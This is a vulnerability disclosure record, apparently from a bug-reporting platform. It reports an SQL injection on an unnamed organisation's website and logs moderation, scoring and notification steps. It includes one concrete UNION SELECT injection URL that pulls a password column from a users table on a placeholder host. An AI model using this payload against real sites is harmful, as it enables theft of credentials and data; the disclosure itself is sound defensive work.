SQL-инъекция

Скрыто название организации 23 Декабрь 2016, 22:23

Подробная информация

Есть SQL инъекции на сайте.
Используя эту слабость возможно краст конфиденциальной информации с сайта (пароли, структура сайта и т.д.)
Sql inject- siteaddress.com/blog_leftsidebar.php?id=-2%27+union+select+1,sifre,3,4+from+istifadeciler--+-%27

Записи

  • 04 Апрель 2017, 17:27
    Статус уязвимости
    Нет ответа от источника

  • 05 Январь 2017, 19:59
    Статус уязвимости
    Отправлено сообщение об уязвимости на электронный адрес источника

  • 03 Январь 2017, 17:03
    Уязвимости присвоен балл
    Модератор присвоил 7 баллов из 10-и на уязвимости

  • 03 Январь 2017, 17:03
    Статус уязвимости
    Подтверждено со стороны модератора

  • 31 Декабрь 2016, 12:53
    Уязвимость изменена
    Уязвимость изменена

  • 28 Декабрь 2016, 15:58
    Уязвимость отказана
    1. Eger SQL injectiondursa onun unvanini ve usulu yollayim. 2. Eger Admin by pass-dirsa admin qovlughunu yollayin.

  • 23 Декабрь 2016, 22:23
    Добавлена уязвимость
    Добавлена уязвимость на BUGemot